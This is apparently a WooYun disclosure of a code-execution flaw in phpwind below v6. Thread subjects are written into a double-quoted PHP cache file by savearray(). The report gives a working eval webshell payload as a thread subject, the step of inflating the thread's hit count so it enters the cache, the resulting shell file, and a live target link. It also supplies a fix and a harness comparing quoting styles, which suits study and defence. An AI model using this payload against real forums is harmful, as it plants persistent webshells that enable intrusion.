
phpwind < v6: command execution vulnerability

2016-02-08 18:25

phpwind/sort.php runs once a day to rebuild the thread rankings by view count, reply count and digest (featured) status.

The code writes the rows returned by the database query straight into a PHP file with savearray(). Every value savearray() emits is wrapped in double quotes; addslashes() escapes the quote characters, but it leaves `$` and `{` alone, and PHP interpolates `${expr}` expressions inside double-quoted literals when the file is loaded. A thread subject containing such an expression is therefore executed as PHP code.

Code:
elseif($action=='article'){
    $cachetime=@filemtime(D_P."data/bbscache/article_sort.php");
    if(!$per || $timestamp-$cachetime>$per*3600){
        $_SORTDB=$_sort=array();
        $query=$db->query("SELECT t.tid,t.subject,t.replies,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.ifcheck='1' AND t.locked<'2' AND f.password='' AND f.allowvisit='' AND f.f_type<>'hidden' ORDER BY t.replies DESC LIMIT $cachenum");
        while($topic=$db->fetch_array($query)){
            if($topic['replies']){
                $topic['subject']=substrs($topic['subject'],25);
                $_sort[]=$topic;
            }
        }
        $_SORTDB['reply']=$_sort;

        $_sort=array();
        $query=$db->query("SELECT t.tid,t.subject,t.hits,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.ifcheck='1' AND t.locked<'2' AND f.password='' AND f.allowvisit='' AND f.f_type<>'hidden' ORDER BY t.hits DESC LIMIT $cachenum");
        while($topic=$db->fetch_array($query)){
            if($topic['hits']){
                $topic['subject']=substrs($topic['subject'],25);
                $_sort[]=$topic;
            }
        }
        $_SORTDB['hit']=$_sort;

        $_sort=array();
        $query=$db->query("SELECT t.tid,t.subject,t.digest,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.digest<>'0' AND t.ifcheck='1' AND t.locked<'2' AND f.password='' AND f.allowvisit='' AND f.f_type<>'hidden' ORDER BY t.lastpost DESC LIMIT $cachenum");
        while($topic=$db->fetch_array($query)){
            $topic['subject']=substrs($topic['subject'],25);
            $_sort[]=$topic;
        }
        $_SORTDB['digest']=$_sort;

        $ARTICLEDB=savearray('_ARTICLEDB',$_SORTDB);
        writeover(D_P.'data/bbscache/article_sort.php',"<?php\r\n".$ARTICLEDB.'?>');
    }



Post a thread with the following subject:

Code:
${@eval($_POST[x])}XXXX

(screenshot: article_title.jpg)





Then run a multithreaded requester (100 threads; a few minutes are enough) against that thread until its hit count ranks it within the top 20 (the query keeps only the top $cachenum threads). The function that serializes the ranking into PHP source is savearray():

Code:
function savearray($name,$array){
    $arraydb="\$$name=array(\r\n\t\t";
    foreach($array as $key=>$value){
        $arraydb.="'".$key."'=>\narray(\r\n\t\t\t";
        foreach($value as $value1){
            $arraydb.='array(';
            foreach($value1 as $value2){
                $arraydb.='"'.addslashes($value2).'",';
            }
            $arraydb.="),\r\n\t\t\t";
        }
        $arraydb.="),\r\n\t\t";
    }
    $arraydb.=");\r\n";
    return $arraydb;
}



The next day, when the ranking is regenerated, the shell is sitting in /data/bbscache/article_sort.php.

Live demonstration on 三个白帽: http://**.**.**.**/data/bbscache/article_sort.php

(screenshot: article_shell.jpg)

Proof of vulnerability:

/data/bbscache/article_sort.php

Code:
<?php
$_ARTICLEDB=array(
    'reply'=>
    array(
        array("1","${@eval($_POST[x])}XXXX ..","5732","2",),
        array("10","DDDDDDDDDDDDDDDDD","20","2",),
        array("7","HI Everybody ( b)ம","8","2",),
        array("3","hello","5","2",),
        array("5","䜲⊔","3","2",),
        array("2","test","3","2",),
        array("9","AAAAAAAAAAAAA","2","2",),
        array("6","ִА⫢","1","2",),
        array("8","⵽բ萾ዢ","1","2",),
    ),
    'hit'=>
    array(
        array("1","${@eval($_POST[x])}XXXX ..","11382","2",),
        array("2","test","3235","2",),
        array("3","hello","985","2",),
        array("5","䜲⊔","331","2",),
        array("7","HI Everybody ( b)ம","123","2",),

Fix:

Wrap client-controlled values in single quotes when writing them into PHP source. PHP does not interpolate `$var` or `${expr}` inside single-quoted literals, and addslashes() already escapes the `'` and `\` characters that could terminate one. Better still, do not hand-assemble PHP source for the cache at all: let var_export() (or serialize()) produce it.
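As an added example (this is not code from the report or from phpwind), the savearray() analysed above is reproduced with the quote character as a parameter, so the only difference between the vulnerable cache file and the fixed one is `"` versus `'`. Both files are generated from constructed rows carrying the report's subject, then loaded the way phpwind loads data/bbscache/article_sort.php. The loadcache() helper, the `$GLOBALS["pwned"]` marker used as the payload, and the `define('x','x')` shim are assumptions of this harness: the report's payload indexes `$_POST` with the bare word `x`, which PHP 5 silently reads as the string 'x' but PHP 8 rejects unless such a constant exists.

```php
<?php
// Added example, not phpwind's own code: savearray() from sort.php with the
// quote character as a parameter, then both outputs loaded with the report's
// payload to show which one executes it.

function savearray($name, $array, $q)
{
    $arraydb = "\$$name=array(\r\n\t\t";
    foreach ($array as $key => $value) {
        $arraydb .= "'" . $key . "'=>\narray(\r\n\t\t\t";
        foreach ($value as $value1) {
            $arraydb .= 'array(';
            foreach ($value1 as $value2) {
                // addslashes() escapes ' " \ and NUL, nothing else. That stops
                // the value from closing the literal, but inside a double-quoted
                // literal PHP still interpolates $var and ${expr} on load.
                $arraydb .= $q . addslashes($value2) . $q . ',';
            }
            $arraydb .= "),\r\n\t\t\t";
        }
        $arraydb .= "),\r\n\t\t";
    }
    $arraydb .= ");\r\n";
    return $arraydb;
}

// Constructed rows in the shape sort.php builds: tid, subject, hits, fid.
// Row 0 carries the subject from the report.
$rows = array(
    'hit' => array(
        array('1', '${@eval($_POST[x])}XXXX', '11382', '2'),
        array('2', 'test', '3235', '2'),
    ),
);

// Stand-in for the attacker's POST body (assumption: the payload only sets a
// marker instead of dropping a file, so the run leaves nothing behind).
$_POST['x'] = '$GLOBALS["pwned"] = true;';
// The report's payload reads $_POST[x] with a bare word; define the constant
// so the demonstration behaves the same on PHP 5 and PHP 8.
if (!defined('x')) {
    define('x', 'x');
}

function loadcache($src)
{
    // Write the generated source to a temp file and include it, as phpwind
    // does with data/bbscache/article_sort.php; report whether the payload
    // ran and what subject ended up stored for row 0.
    $file = tempnam(sys_get_temp_dir(), 'pw');
    file_put_contents($file, "<?php\r\n" . $src . '?>');
    unset($GLOBALS['pwned']);
    $_ARTICLEDB = array();
    include $file;
    unlink($file);
    return array(isset($GLOBALS['pwned']), $_ARTICLEDB['hit'][0][1]);
}

list($ran, $subject) = loadcache(savearray('_ARTICLEDB', $rows, '"'));
printf("double quotes: payload ran=%s, stored subject=%s\n", var_export($ran, true), $subject);

list($ran, $subject) = loadcache(savearray('_ARTICLEDB', $rows, "'"));
printf("single quotes: payload ran=%s, stored subject=%s\n", var_export($ran, true), $subject);
```

With double quotes the include runs the eval and the stored subject loses its `${...}` prefix, because the interpolated expression evaluates to an empty variable name; with single quotes the subject is stored verbatim and nothing executes. PHP 8.2 and later emit a deprecation notice for `${expr}` inside strings but still evaluate it, so the double-quoted variant remains exploitable there.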


Source: www.wooyun.org/bugs/wooyun-2016-0153256
